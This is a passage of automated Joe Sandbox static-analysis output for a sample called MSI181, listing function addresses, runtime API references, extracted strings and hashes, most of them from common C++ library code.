LocalAlloc.KERNEL32(00000040,0000000C,00000000,F302A5AA,?,00000000,00000000), ref: 0058B5CF
std::_Facet_Register.LIBCPMT ref: 0058B6B7
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B6E1

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: cb367f33de5d6cae188a17d37e4d63f9ec1f4d00fb63a493c5781c48c027b1ef
Instruction ID: 3eb61401f8a864ac9cb20c0667cc993986036920aa808b1c08c04a99613c7f38
Opcode Fuzzy Hash: cb367f33de5d6cae188a17d37e4d63f9ec1f4d00fb63a493c5781c48c027b1ef
Instruction Fuzzy Hash: 1251D170900209DFEF11EF98C884BAEBFB8FF50314F24455AE815AB391E7759A05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0058B700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0058B731
std::_Lockit::_Lockit.LIBCPMT ref: 0058B74F
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B777
LocalAlloc.KERNEL32(00000040,00000008,00000000,F302A5AA,?,00000000,00000000), ref: 0058B7CF
std::_Facet_Register.LIBCPMT ref: 0058B863
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B88D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: 920c8691f1ef8de8e00d9cc9772f06d8072660171d2ea071323e5d0462c43597
Instruction ID: 9260f61f0179c68326b7d8411a94c06d3864ebb4745984a2d4e99b4b3cd82b0a
Opcode Fuzzy Hash: 920c8691f1ef8de8e00d9cc9772f06d8072660171d2ea071323e5d0462c43597
Instruction Fuzzy Hash: 89519D70901215DFEB21EF98C885B9EBFB8FB54710F24855EE815AB382D774AE05DB80

Uniqueness

Uniqueness Score: -1.00%

Function 005B0351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 005B043B
__freea.LIBCMT ref: 005B04D1
__freea.LIBCMT ref: 005B04ED

Strings

am/pm, xrefs: 005B0551
a/p, xrefs: 005B05B5

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: 894ce91b372fb78ea96602bc8a35b59fb72a1125049876868971a9e6a42128e1
Instruction ID: 4136bdadba0465cd4140aaae84b3cd75757e534ae1062e606a9bbfb123e5362f
Opcode Fuzzy Hash: 894ce91b372fb78ea96602bc8a35b59fb72a1125049876868971a9e6a42128e1
Instruction Fuzzy Hash: 44C188359002169ADF248F68C989AFFBFB0FF5A700F246489E505AB6D0D635BD41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00585890 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?,75EF4450,00585646,?,?,?,?,?), ref: 00585898

Strings

true, xrefs: 005858A7, 005858B6
false, xrefs: 005858A2
<S], xrefs: 00585919
Call to ShellExecuteEx() returned:, xrefs: 005858AF
Last error=, xrefs: 005858D9

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLast
String ID: <S]$Call to ShellExecuteEx() returned:$Last error=$false$true
API String ID: 1452528299-3137331878
Opcode ID: bdbe69fcceed54ac34cf897e42d29c417d176e3d995038f44159ab4153df7128
Instruction ID: 19cc4cfe9c22749c3442b8e0fc7472123436b47a03b180b38e123d3bf5396fae
Opcode Fuzzy Hash: bdbe69fcceed54ac34cf897e42d29c417d176e3d995038f44159ab4153df7128
Instruction Fuzzy Hash: B9118E5AA1062687CB302F6C980033AAAE4FF50755F65087FDCC9E7391FAA98C818394

Uniqueness

Uniqueness Score: -1.00%

Function 005A5978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,005A596F,005A4900,005A358F), ref: 005A5986
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005A5994
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005A59AD
SetLastError.KERNEL32(00000000,005A596F,005A4900,005A358F), ref: 005A59FF

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d533ecbed8de8d0b50d3eb4ff375e478b6f25f5baa60ffdec650b823b4c5f151
Instruction ID: 6bbf5ac8944ee1aaf6e80a3a117816360c82a9c5e86c3cbc65ec0283e50b072f
Opcode Fuzzy Hash: d533ecbed8de8d0b50d3eb4ff375e478b6f25f5baa60ffdec650b823b4c5f151
Instruction Fuzzy Hash: 3C01B13221AB17EFA63426786C8EE6F2F54FB53779720032BF414881E5FE114C09E190

Uniqueness

Uniqueness Score: -1.00%

Function 00583230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,URL,00000000,?,F302A5AA,?,00000004), ref: 00583294
MoveFileW.KERNEL32(?,00000000), ref: 0058354A
DeleteFileW.KERNEL32(?), ref: 00583592

Part of subcall function 00581A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00581AF7
Part of subcall function 00581A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00581B7D

Part of subcall function 00582E60: LocalFree.KERNEL32(?,F302A5AA,?,?,005C3C40,000000FF,?,00581242,F302A5AA,?,?,005C3C75,000000FF), ref: 00582EB1

Strings

URL, xrefs: 0058328E, 0058357A
url, xrefs: 005833B9, 00583575

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: FileLocal$Free$AllocDeleteMoveNameTemp
String ID: URL$url
API String ID: 853893950-346267919
Opcode ID: 27c595ab899b7e02e6228cb313b15a36a98eeb6758954bc13d99f3c00f379f35
Instruction ID: 8ba8e3a1000de0110455dad7713d7883250f395f2e80fa76b91d2f21d553f4a7
Opcode Fuzzy Hash: 27c595ab899b7e02e6228cb313b15a36a98eeb6758954bc13d99f3c00f379f35
Instruction Fuzzy Hash: CAC17A70D142699ADB24EF28CC9CBDDBBB4BF54704F1042D9D409A7291EBB46B88CF90

Uniqueness

Uniqueness Score: -1.00%

Function 005A5A58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 005A5B1F
___AdjustPointer.LIBCMT ref: 005A5B42
___AdjustPointer.LIBCMT ref: 005A5BDE

Strings

2Z, xrefs: 005A5AB7

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: AdjustPointer
String ID: 2Z
API String ID: 1740715915-2484645983
Opcode ID: f288329cebc3267a247d9b86eb0700244644d5f8d4ce1035f6132db936724b11
Instruction ID: e5ba833cec36f976c7e612a103f22c05578e3b38aff9d55e7edb3abd76e93ed8
Opcode Fuzzy Hash: f288329cebc3267a247d9b86eb0700244644d5f8d4ce1035f6132db936724b11
Instruction Fuzzy Hash: C451A072601A0ADFDB298F94D845F6E7FA4FF86312F144529E80647291F771ED40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005836D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00583735
GetLastError.KERNEL32(?,?,?,005C4215,000000FF), ref: 0058381A

Part of subcall function 00582310: GetProcessHeap.KERNEL32 ref: 00582365

Part of subcall function 005846F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00583778,-00000010,?,?,?,005C4215,000000FF), ref: 00584736

_wcschr.LIBVCRUNTIME ref: 005837C6
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,005C4215,000000FF), ref: 005837DB

Strings

ntdll.dll, xrefs: 005837B3

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
String ID: ntdll.dll
API String ID: 3941625479-2227199552
Opcode ID: 92feb0882c5e7afceb11f651b2c70a0ab13eab03293614f8795931f0f77b317d
Instruction ID: f4549c61f0f9b52b813b1131ee43042d4a61d5786585d2d04794200e0b7c81bd
Opcode Fuzzy Hash: 92feb0882c5e7afceb11f651b2c70a0ab13eab03293614f8795931f0f77b317d
Instruction Fuzzy Hash: 0641A0716006069FDB10EFA8CC59BAEBBA4FF14710F144529FD16E7281EBB0AA04CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0059D3CB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0059D3D2

Part of subcall function 0059254E: __EH_prolog3.LIBCMT ref: 00592555
Part of subcall function 0059254E: std::_Lockit::_Lockit.LIBCPMT ref: 0059255F
Part of subcall function 0059254E: std::_Lockit::~_Lockit.LIBCPMT ref: 005925D0

_Find_elem.LIBCPMT ref: 0059D46E

Strings

2Z, xrefs: 0059D425
%.0Lf, xrefs: 0059D419
0123456789-, xrefs: 0059D41E

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 2Z$%.0Lf$0123456789-
API String ID: 2544715827-3036050365
Opcode ID: 69ec5f62cb80e1159cf3f9759f59df28621ffdf263bb5681137b8b8668f1fe06
Instruction ID: 33811a1d6552caab909f78dead400ed02299e9cc98882c5d76723d21ee563d61
Opcode Fuzzy Hash: 69ec5f62cb80e1159cf3f9759f59df28621ffdf263bb5681137b8b8668f1fe06
Instruction Fuzzy Hash: F1416B31900219DFCF15EFA8C885AEDBFB5FF48314F010159E805AB256DB74EA56CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0059D66F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0059D676

Part of subcall function 00588610: std::_Lockit::_Lockit.LIBCPMT ref: 00588657
Part of subcall function 00588610: std::_Lockit::_Lockit.LIBCPMT ref: 00588679
Part of subcall function 00588610: std::_Lockit::~_Lockit.LIBCPMT ref: 005886A1
Part of subcall function 00588610: std::_Lockit::~_Lockit.LIBCPMT ref: 0058880E

_Find_elem.LIBCPMT ref: 0059D712

Strings

2Z, xrefs: 0059D6C9
0123456789-, xrefs: 0059D6BD
0123456789-, xrefs: 0059D6C2

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 2Z$0123456789-$0123456789-
API String ID: 3042121994-463492524
Opcode ID: 1f2f4c66d9072ccd5b8e681bee8856b302f125cf77efb5fc45c89ec164440838
Instruction ID: 6cdea182daf743d45415e15e532ee78ba9d8af1f5f819084a62aa6bb923486a3
Opcode Fuzzy Hash: 1f2f4c66d9072ccd5b8e681bee8856b302f125cf77efb5fc45c89ec164440838
Instruction Fuzzy Hash: 33416A31900219DFCF05EFE8C884AEEBFB5FF48314F100059E911AB256DB309A56CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005A175A Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005A1761

Part of subcall function 00589270: std::_Lockit::_Lockit.LIBCPMT ref: 005892A0
Part of subcall function 00589270: std::_Lockit::_Lockit.LIBCPMT ref: 005892C2
Part of subcall function 00589270: std::_Lockit::~_Lockit.LIBCPMT ref: 005892EA
Part of subcall function 00589270: std::_Lockit::~_Lockit.LIBCPMT ref: 00589422

_Find_elem.LIBCPMT ref: 005A17FB

Strings

2Z, xrefs: 005A17B4
0123456789-, xrefs: 005A17A8
0123456789-, xrefs: 005A17AD

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 2Z$0123456789-$0123456789-
API String ID: 3042121994-463492524
Opcode ID: 81033fd5ef5645aceb6142cee9f5bc66e36733ee7646223a073e8a6fc3d4e3e9
Instruction ID: 8756e55192492c115f58fdc0ee4ef8f410d99e190e41a9a4321f5a323d8a74ca
Opcode Fuzzy Hash: 81033fd5ef5645aceb6142cee9f5bc66e36733ee7646223a073e8a6fc3d4e3e9
Instruction Fuzzy Hash: C4414B3590020AEFCF05EFA4D885AAEBFB5FF45314F10405AF811AB252DB349A56CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0058621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00581A20: LocalFree.KERNEL32(?), ref: 00581A42

Part of subcall function 005A3E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00581434,?,?,0058D341,00581434,005D8B5C,?,00581434,?,00000000), ref: 005A3EBA

GetCurrentProcess.KERNEL32(F302A5AA,F302A5AA,?,?,00000000,005C4981,000000FF), ref: 005862EB

Part of subcall function 005A2C98: EnterCriticalSection.KERNEL32(005DDD3C,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2CA3
Part of subcall function 005A2C98: LeaveCriticalSection.KERNEL32(005DDD3C,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 005862B0
GetProcAddress.KERNEL32(00000000), ref: 005862B7

Part of subcall function 005A2C4E: EnterCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C58
Part of subcall function 005A2C4E: LeaveCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C8B
Part of subcall function 005A2C4E: RtlWakeAllConditionVariable.NTDLL ref: 005A2D02

Strings

IsWow64Process, xrefs: 005862A6
kernel32, xrefs: 005862AB

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
String ID: IsWow64Process$kernel32
API String ID: 1333104975-3789238822
Opcode ID: e021af2c1bae59fc0e3980ae257535ee12ea499ac17cc12029b7b77563fe79f3
Instruction ID: 76bab250bcf4a60a4bcbc2b9801daca0ffe822942262d8f4c32f20ff2cc071cb
Opcode Fuzzy Hash: e021af2c1bae59fc0e3980ae257535ee12ea499ac17cc12029b7b77563fe79f3
Instruction Fuzzy Hash: 6E21CF7190560AAFCB20EF98DD0AF5DBFA8FB28710F000626F911A76D0EB74A904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00598451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00598458
_Getvals.LIBCPMT ref: 005984AA
_Mpunct.LIBCPMT ref: 005984E5
_Mpunct.LIBCPMT ref: 005984FF

Strings

$+xv, xrefs: 0059850A

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: e81f18e0bf468bd33df72724c79164e5f8ad1994b3d94d2c87db4e218bf8a67c
Instruction ID: 23bbbcb1322b0962830fce431ba964fe8181fb71a58ff705cd8d7ee1f3efbb72
Opcode Fuzzy Hash: e81f18e0bf468bd33df72724c79164e5f8ad1994b3d94d2c87db4e218bf8a67c
Instruction Fuzzy Hash: 1C21A1B1800A936EDF21DF74889477FBEE8BF49304B04091AE459C7A42D734E601CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0058F3D9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058F3E0
std::_Lockit::_Lockit.LIBCPMT ref: 0058F3EA
std::_Lockit::~_Lockit.LIBCPMT ref: 0058F48E
Concurrency::cancel_current_task.LIBCPMT ref: 0058F499

Strings

2Z, xrefs: 0058F43E, 0058F45D, 0058F477

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID: 2Z
API String ID: 4244582100-2484645983
Opcode ID: 74405d8dde9576b20befb7e34bc47f15d08395f604fd089297944849040ab8a2
Instruction ID: 301ecc014bbdc4c08fc598585c3940f9b1d224b2913184cc546a4ac5d5e2403a
Opcode Fuzzy Hash: 74405d8dde9576b20befb7e34bc47f15d08395f604fd089297944849040ab8a2
Instruction Fuzzy Hash: 36216034A0061ADFCB04EF14C855A6DBBB1FF48720F10846AE815AB7A1CB30EE50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00586250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(F302A5AA,F302A5AA,?,?,00000000,005C4981,000000FF), ref: 005862EB

Part of subcall function 005A2C98: EnterCriticalSection.KERNEL32(005DDD3C,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2CA3
Part of subcall function 005A2C98: LeaveCriticalSection.KERNEL32(005DDD3C,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 005862B0
GetProcAddress.KERNEL32(00000000), ref: 005862B7

Part of subcall function 005A2C4E: EnterCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C58
Part of subcall function 005A2C4E: LeaveCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C8B
Part of subcall function 005A2C4E: RtlWakeAllConditionVariable.NTDLL ref: 005A2D02

Strings

IsWow64Process, xrefs: 005862A6
kernel32, xrefs: 005862AB

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
String ID: IsWow64Process$kernel32
API String ID: 2056477612-3789238822
Opcode ID: 4aecf9a671f8b59e031b67143c786a262a2abd81cac87af201d8c119b67a13d5
Instruction ID: 298fde8af1f4a36f7a67ea1515a99d5d2d6799df8c72db4edc54110bd1a67d93
Opcode Fuzzy Hash: 4aecf9a671f8b59e031b67143c786a262a2abd81cac87af201d8c119b67a13d5
Instruction Fuzzy Hash: 9511C072905619DFCB20DF98ED0AB99BBA8F728720F00066BE811A37C0E775A904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 005A69E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,005A6AA3,?,?,005DDDCC,00000000,?,005A6BCE,00000004,InitializeCriticalSectionEx,005C97E8,InitializeCriticalSectionEx,00000000), ref: 005A6A72

Strings

api-ms-, xrefs: 005A6A32

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 0d0713d8049e8edf6325dc836ab4b7d1556b61ff21880734ed688c9c24195ccc
Instruction ID: b24fb2056228c8a2712970b04d9a1ac3e63a330be05a94172dc7ead4e8a00a31
Opcode Fuzzy Hash: 0d0713d8049e8edf6325dc836ab4b7d1556b61ff21880734ed688c9c24195ccc
Instruction Fuzzy Hash: 4411A335A05625EBCB228B689C45B5D3BA4BF17770F198260F915FB280D670ED009AD5

Uniqueness

Uniqueness Score: -1.00%

Function 005922FA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592301
std::_Lockit::_Lockit.LIBCPMT ref: 0059230B

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0059235C
